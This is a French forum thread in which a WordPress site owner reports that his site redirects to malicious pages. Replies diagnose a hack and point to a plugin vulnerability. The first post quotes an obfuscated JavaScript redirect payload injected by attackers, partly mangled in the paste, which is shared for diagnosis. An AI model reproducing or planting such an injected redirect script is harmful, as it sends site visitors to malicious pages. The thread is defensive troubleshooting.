Bonjour,
Aujourd'hui en tentant d'accéder à mon site Wordpress j'ai remarqué que l'adresse redirigeait toute seule vers des sites à priori malveillant. Le nom de domaine est jordanmolet.com.
Je pensais pouvoir accéder à la partie admin de Wordpress pour connaître l'origine du problème et tenter de le résoudre, mais l'adresse
> http://jordanmolet.com/wp-admin/
me redirige vers
> https://line.storerightdesicion.com/ping/?track_js/wp-login_php&redirect_to=https%3A%2F%2Fjordanmolet.com%2Fwp-admin%2F&reauth=1
avec le message suivant qui apparaît.
> function _0x4ee7(_0x3ab2b1,_0x232aee){var _0x45919d=_0x4591();return _0x4ee7=function(_0x4ee7d2,_0x3b1a79){_0x4ee7d2=_0x4ee7d2-0x11e;var _0x1f4a7d=_0x45919d_0x4ee7d2];return _0x1f4a7d;},_0x4ee7(_0x3ab2b1,_0x232aee);}var _0xa160ea=_0x4ee7;(function(_0x49005e,_0x4c2ad1){var _0x573fb3=_0x4ee7,_0x4721a3=_0x49005e();while(!!){try{var _0x59874f=-parseInt(_0x573fb3(0x128))/0x1+-parseInt(_0x573fb3(0x120))/0x2+parseInt(_0x573fb3(0x11e))/0x3+parseInt(_0x573fb3(0x127))/0x4*(parseInt(_0x573fb3(0x12a))/0x5)+parseInt(_0x573fb3(0x124))/0x6*(parseInt(_0x573fb3(0x122))/0x7)+parseInt(_0x573fb3(0x123))/0x8+parseInt(_0x573fb3(0x125))/0x9;if(_0x59874f===_0x4c2ad1)break;else _0x4721a3['push');}catch(_0x4acffc){_0x4721a3'push');}}}(_0x4591,0x7af8b),window_0xa160ea(0x11f));function _0x4591(){var _0x16eed7='4004dIMjRC','147351WdUMnX','fromCharCode','335aMKfUh','2002650enzoTj','stop','1288394qSNcFM','location','574714TfwWyK','182616IKcngI','6tizDAA','4101237ZDJeSt','replace'];_0x4591=function(){return _0x16eed7;};return _0x4591();}var lk=String[_0xa160ea(0x129);document_0xa160ea(0x121)]['href']=lk,window[_0xa160ea(0x121)][_0xa160ea(0x126);
Avez-vous un idée du problème et des pistes de solution?
Merci.
Bonsoir @JordanM7,
Ton site a été hacké.
Soit tu restaures une sauvegarde (hébergement et base de données) d'avant le problème.
Soit tu effaces tout et tu recommence à zéro.
Dans tous les cas, tu changes les mots de passe de ton PC, du login OVH, de l'admin de ton site, du FTP et de la base de données.
Bonjour,
Soit tu restaures une sauvegarde (hébergement et base de données) d'avant le problème.
Précision : PAS une sauvegarde faite par OVH car vous ne savez pas si elle sont infectés ou non.
Vu la forte augmentation des infections on dirais bien qu'un plugin utilisé par pas mal de personnes présentent une vulnérabilité connu et exploité (ou une faille 0day dans WordPress).
EDIT : Failles critiques dans "All in One SEO"
Cf : https://blog.sucuri.net/2021/12/critical-vulnerabilities-in-all-in-one-seo-plugin-affects-millions-of-wordpress-websites.html
Cordialement, janus57